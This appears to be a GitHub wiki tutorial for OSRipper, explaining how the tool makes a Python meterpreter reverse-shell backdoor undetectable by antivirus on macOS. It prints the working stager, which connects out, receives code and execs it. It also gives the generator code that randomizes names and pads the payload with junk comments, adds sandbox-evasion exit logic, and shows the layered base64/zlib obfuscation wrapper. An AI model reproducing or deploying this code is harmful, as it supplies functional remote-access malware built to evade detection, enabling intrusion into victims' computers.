-
Notifications
You must be signed in to change notification settings - Fork 48
Home
OSRipper remains FUD on OSX since it came out and will remain so for a long time. In this wiki I will explain how and why it works in a step for step tutorial.
For the purpose of this tutorial we will assume the user is generating a reverse_tcp_ssl backdoor. This is a python meterpreter that is seen as the standart. For this reason this code flags up on every VT.
import zlib,base64,ssl,socket,struct,time
for x in range(10):
try:
so=socket.socket(2,1)
so.connect((hototo,port))
s=ssl.wrap_socket(so)
break
except:
time.sleep(10)
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(l)
while len(d)<l:
d+=s.recv(l-len(d))
exec(zlib.decompress(base64.b64decode(d)),{'s':s})
OSRipper uses this Code but makes it FUD. Our first step is critical in ensuring the uniqueness of the Backdoor. This is important because that way Antiviruses can not detect this with conventional methdods.
Before showing the randomised code i would like to show the proccess of randomising it.
## RandomVariables
nonce1=secrets.randbelow(14)
nonce2=secrets.randbelow(14)
UltimateRandomNumberhigh = random.randint(15,30)
UltimateRandomNumberlow=secrets.randbelow(nonce1)
UltimateRandomNumberhigh2 = random.randint(15,30)
UltimateRandomNumberlow2=secrets.randbelow(nonce2)
sleeptime = secrets.randbelow(12)
VariableRange = random.randint(8,22)
VariableRange2 = random.randint(8,22)
VariableRange3 = random.randint(8,22)
RandomisationNum = random.randint(UltimateRandomNumberlow,UltimateRandomNumberhigh)
RandomisationNum2 = random.randint(UltimateRandomNumberlow2,UltimateRandomNumberhigh2)
c=(''.join(secrets.choice(string.ascii_uppercase + string.ascii_lowercase) for i in range(int(VariableRange))))
d=(''.join(secrets.choice(string.ascii_uppercase + string.ascii_lowercase) for i in range(int(VariableRange2))))
so=(''.join(secrets.choice(string.ascii_uppercase + string.ascii_lowercase) for i in range(int(VariableRange))))
s=(''.join(secrets.choice(string.ascii_uppercase + string.ascii_lowercase) for i in range(int(VariableRange2))))
l=(''.join(secrets.choice(string.ascii_uppercase + string.ascii_lowercase) for i in range(int(VariableRange3))))
dr=(''.join(secrets.choice(string.ascii_uppercase + string.ascii_lowercase) for i in range(int(VariableRange3))))
## jesus christ that was a LOT of random variables (and there are even more hidden away)
Now all of these have a purpose. They randomize variables, ranges of useless bloating code, the size structure of the backdoor and even other random numbers and/or strings (Yes the code is so random that the amount of randomness is random) ##Excuse my humour.
Now this is the template which the variables are put into:
for i in range(int(RandomisationNum)):
a=(''.join(secrets.choice(string.ascii_uppercase + string.ascii_lowercase + string.punctuation)for i in range(int(random.randint(0,17)))))
ina.write('#'+a+'\n')
b = '''
from sandboxed import is_sandboxed
import sys
certainty = is_sandboxed(logging=False)
if int(certainty)>0.5:
sys.exit()
import zlib,base64,ssl,socket,struct,time
'''
ina.write(b)
for i in range(int(RandomisationNum2)):
b3=(''.join(secrets.choice(string.ascii_uppercase + string.ascii_lowercase + string.punctuation)for i in range(int(random.randint(0,7)))))
ina.write('#'+b3+'\n')
b2 = '''
for x in range(10):
try:
'''+so+'''=socket.socket(2,1)
'''+so+'''.connect(('''+c+''','''+d+'''))
'''+s+'''=ssl.wrap_socket('''+so+''')
break
except:
time.sleep('''+str(sleeptime)+''')
'''+l+'''=struct.unpack('>I','''+s+'''.recv(4))[0]
'''+dr+'''='''+s+'''.recv('''+l+''')
while len('''+dr+''')<'''+l+''':
'''+dr+'''+='''+s+'''.recv('''+l+'''-len('''+dr+'''))
exec(zlib.decompress(base64.b64decode('''+dr+''')),{'s':'''+s+'''})
'''
ina.write(b2)
Our backdoor would look like this now:
(Note: This is just an example. The chance of your Backdoor looking like this is so low that it is practically 0)
oFoEeCBkuGbMb = 3131
TUnfjZTKed = "localhost"
#QjX
#U[Dz^x.X
#AAuuTFS|H_)ff#
#Y/RIOMJ!TQE(_pAa
#{-hnk
#>PQd&HAs\GHnel
#p.u
#yv]{a[H
#VJp-@x'rw>Ij|
#-MNuTM)u~dVP(=
#NjM/
#Z,Qfe
#m!wPXuiq'q=:`
#'`V
#+?FR!CCeDYX&X
#;E:BanP:l\.{h>j-f
#:Z~
#{MvUxf\[v)QcZP
#s)r*
from sandboxed import is_sandboxed
import sys
certainty = is_sandboxed(logging=False)
if int(certainty)>0.5:
sys.exit()
import zlib,base64,ssl,socket,struct,time
#SF
#IdBUl
#?|'D~e_
#<eGx
#:/+n.zu
#!ELYc
#n^;pe-J
#+
#j
#mj\
#-Ep'k
#k>h
#)]+&;
#
#EH#:
#x`Lpqo
#XX
#@R;
#
#)Jw-br
#jL@|CT
#
#'n+PV'd
for x in range(10):
try:
XhtdBOXRbZ=socket.socket(2,1)
XhtdBOXRbZ.connect((TUnfjZTKed,oFoEeCBkuGbMb))
WEzmuVHZePcTZ=ssl.wrap_socket(XhtdBOXRbZ)
break
except:
time.sleep(10)
rkADKrpRQeEPQqdPzrx=struct.unpack('>I',WEzmuVHZePcTZ.recv(4))[0]
byhBYCrScioOzxZowuO=WEzmuVHZePcTZ.recv(rkADKrpRQeEPQqdPzrx)
while len(byhBYCrScioOzxZowuO)<rkADKrpRQeEPQqdPzrx:
byhBYCrScioOzxZowuO+=WEzmuVHZePcTZ.recv(rkADKrpRQeEPQqdPzrx-len(byhBYCrScioOzxZowuO))
exec(zlib.decompress(base64.b64decode(byhBYCrScioOzxZowuO)),{'s':WEzmuVHZePcTZ})
Now we can start with the Obfuscation
The obfuscation works like this. First the code is encoded in base64. Then the base64 string is compressed by zlib. Doing only this helps with preventing AV detection but however OSRipper does this multiple hundred times (again the integer is chosen randomly)
_ = lambda __ : __import__('zlib').decompress(__import__('base64').b64decode(__[::-1]));exec((_)(b'='))
This is the final product before it gets encrypted with AES by tinyaes during compilation.